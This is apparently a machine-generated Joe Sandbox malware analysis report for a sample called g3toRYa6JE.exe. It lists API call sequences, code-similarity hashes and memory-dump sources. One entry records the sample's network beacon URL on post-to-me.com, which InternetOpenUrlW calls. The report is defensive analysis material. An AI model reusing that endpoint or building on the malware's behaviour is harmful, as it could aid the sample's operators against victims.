                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1844465188-0
                                                                                                                                                                                                                              • Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                                                                                                                                              • Instruction ID: b95fc7fb1fe7aad85045af23a6c401d26a3c8bb92ad5560bf8f54376da24cb96
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29218B71990308EFDB11FFA4D459BDDBBB0BF50711F10852AE085AB282DB7C9944CBA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431F88
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431FAF
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00431FC5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                              • Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(0078DACD,0078DACD,00000002,007AED25,007B3941,00000000,?,007A69F5,00000002,00000000,00000000,00000000,?,0078CF7E,0078DACD,00000004), ref: 007B21BA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B21EF
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B2216
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,0078DACD), ref: 007B2223
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,0078DACD), ref: 007B222C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                              • Instruction ID: 5a1c246788d9c24741ddb736abc5a60043e52292a3ca3f0db3d084409cb783b2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B201F936107A00BBC21227246C4DBEB266DFBD5B76B610128F915D3293EE7D8D038125
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                              • Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B2190
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B219D
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                              • Instruction ID: 94ef5f993bf34cd9ad17cf74863c8e8227a453b61078a2d8b7251ddf3a56d199
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2F0A935546B08BBD212372CAC0EBDA26695FD2B67F650224F514D3293EE6D8903812A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733
                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A
                                                                                                                                                                                                                                • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
                                                                                                                                                                                                                                • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
                                                                                                                                                                                                                                • Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
                                                                                                                                                                                                                                • Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061
                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
                                                                                                                                                                                                                              • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041797A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4266703842-0
                                                                                                                                                                                                                              • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                              • Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00792994: TlsGetValue.KERNEL32(?,?,00790DB2,00792EBF,00000000,?,00790D90,?,?,?,00000000,?,00000000), ref: 0079299A
                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00797BA1
                                                                                                                                                                                                                                • Part of subcall function 007A120A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 007A1231
                                                                                                                                                                                                                                • Part of subcall function 007A120A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 007A124A
                                                                                                                                                                                                                                • Part of subcall function 007A120A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 007A12C0
                                                                                                                                                                                                                                • Part of subcall function 007A120A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 007A12C8
                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00797BAF
                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00797BB9
                                                                                                                                                                                                                              • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00797BC3
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00797BE1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4266703842-0
                                                                                                                                                                                                                              • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                              • Instruction ID: dbb4873af78d522aa7ac3025911480739369d803695c701a7081a172a2ac09f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBF02B71600218E7CF1AB3B5B85A96EB7699FD1B20F04412AF41153252EF2CDE16C7C2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00439E4D
                                                                                                                                                                                                                                • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00439E5F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00439E71
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00439E83
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00439E95
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                              • Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA0B4
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: HeapFree.KERNEL32(00000000,00000000,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?), ref: 007B36D7
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: GetLastError.KERNEL32(?,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?,?), ref: 007B36E9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA0C6
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA0D8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA0EA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA0FC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                              • Instruction ID: 82f30045b5bdb81a93433d468a29ef45a17e0e94dfbd8ecf56c8f1554026bc3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBF01232505304B78630FB58F9C7E9677E9AA00715BA40955F448D7722DB39FCD0865A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431738
                                                                                                                                                                                                                                • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043174A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043175D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043176E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043177F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                              • Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
                                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0041CCF9
                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2583373041-0
                                                                                                                                                                                                                              • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                              • Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B199F
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: HeapFree.KERNEL32(00000000,00000000,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?), ref: 007B36D7
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: GetLastError.KERNEL32(?,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?,?), ref: 007B36E9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B19B1
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B19C4
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B19D5
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B19E6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                              • Instruction ID: af9456d880bae26d56672a4f3dde4c001ba4197b9dbae856bd2cfe942d746a19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF05470C00350EB8E217F14BC955443B60EF197227800266F40697373C73CD9A2DB8E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0079CF26
                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0079CF57
                                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0079CF60
                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0079CF73
                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0079CF7C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2583373041-0
                                                                                                                                                                                                                              • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                              • Instruction ID: 22da64ce4242575fbcdeda9b8fb697b609fb7c0be0cca9c6e4e0bb36dde689d6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13F08C36200600DB8E26EF60FA598BA73B7AFC4710300095CF48706662CF29A906D731
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00782E84
                                                                                                                                                                                                                                • Part of subcall function 00781321: _wcslen.LIBCMT ref: 00781328
                                                                                                                                                                                                                                • Part of subcall function 00781321: _wcslen.LIBCMT ref: 00781344
                                                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00783097
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                              • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                              • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                              • Opcode ID: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                                                                                                                                              • Instruction ID: f2d7b1b7172b5e138b10be6aa630872621b255696ad4cfb9090282d41b52c58d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A518195A65344A9E320EBB0FC46B3533B8FF58712F10543AE518CB2B2E7B59944871E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                              • String ID: BC$BC
                                                                                                                                                                                                                              • API String ID: 885266447-2490606219
                                                                                                                                                                                                                              • Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                              • Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B46CB
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B46E0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                              • String ID: ME{$ME{
                                                                                                                                                                                                                              • API String ID: 885266447-1961669832
                                                                                                                                                                                                                              • Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                              • Instruction ID: 3a654a876b0192c386efcf512c329453b0e45b6ee1b4b8fa0b97e2978af478e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42513D71A00248AFCF18DF5CC884EEDBBB2EF99318F198299E81897266D775DD51CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\g3toRYa6JE.exe,00000104), ref: 0042F743
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0042F80E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0042F818
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\g3toRYa6JE.exe
